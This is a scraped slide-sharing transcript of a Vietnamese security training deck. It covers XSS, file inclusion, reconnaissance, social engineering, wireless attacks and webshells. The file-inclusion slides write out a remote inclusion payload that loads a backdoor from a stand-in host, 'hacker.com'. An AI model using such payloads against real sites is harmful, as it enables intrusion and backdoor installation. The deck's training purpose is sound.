security task force trainning
Post on 22-Jun-2015
92 Views
Preview:
DESCRIPTION
TRANSCRIPT
Security Task Force Trainning
Nguyễn Ngọc MinhBkis Security
Nội dung bài giới thiệu
Các lỗ hổng XSS & File Inclusion
Tấn công dựa trên thăm dò và tìm kiếm (Footprinting, Scanning)
Tấn công dựa trên điểm yếu con người (Social Engineering)
Tấn công qua mạng không dây (Wireless Hacking)
Case Study: Làm việc với các webshell cơ bản.
Lỗ hổng XSS
Xét một ví dụ thực tế
Login Login
???
Cookie1 Cookie2
Session1 Session2
Mỗi trình duyệt có thể mở nhiều website
Cơ chế Cross –Domain giúp cho “website” này không lấy được thông tin của “website” kia
http://bkav.com/timkiem.asp?tukhoa=hello
<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div>
MỌI THÔNG TIN INPUT ĐỀU ĐƯỢC OUTPUT RA TRÌNH DUYỆT!!!
http://bkav.com/timkiem.asp?tukhoa= hello<br><br></div> [Một đoạn mã html - Javascript] <div>
Một đoãn Mã JavaScript sẽ được thực thi!!!
<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div> [Một đoạn mã html- Javascript] <div> <br><br></div>
http://bkav.com/timkiem.asp?tukhoa= hello<br><br></div> [Một đoạn mã html - Javascript] <div>
Một đoãn Mã JavaScript sẽ được thực thi!!!
<br><div class="agent_name">Kết quả tìm kiếm<br><br>Không tìm thấy từ hello<br><br></div> [Một đoạn mã html- Javascript] <div> <br><br></div>
Kịch bản tấn công XSS
DEMO: Khai thác lỗ hổng XSS
Lỗ hổng File Inclusion
Cơ chế Include
……..Include(‘a.txt’)………
a.Txt………..……..….......……..
……..…….........………….…….........………….………
Vì sao cần phải có cơ chế include
Tối giản mã
Phát triển module
……..
nokia/product_info.phpsony/product_info.php
include(“$sanpham/product.info”);http://hacker.com/backdoor.txt%00
include(“http://hacker.com/backdoor.txt%00/product.info”);
include(“http://hacker.com/backdoor.txt”);
DEMO: Khai thác lỗ hổng File Inclusion
Tấn công qua các lỗ hổng đã biết
* Bản vá
* Mã khai thác được công bố
* Target
DEMO: Tấn công khai tháchttp://www.faultlyne.com
Foot Printing & Scanning
Foot Printing & Scanning???
DEMO: Lấy thông tin của www.bkav.com.vn
NMAP
Google Hacking
Social Engineering
• Gọi điện thoại
• Nhân viên dịch vụ…
Wireless Hacking
Mã hóa
Chứng thực
WEP
WPA
WPA2
Case Study:Thực hành với các webshell
Xin cảm ơn
top related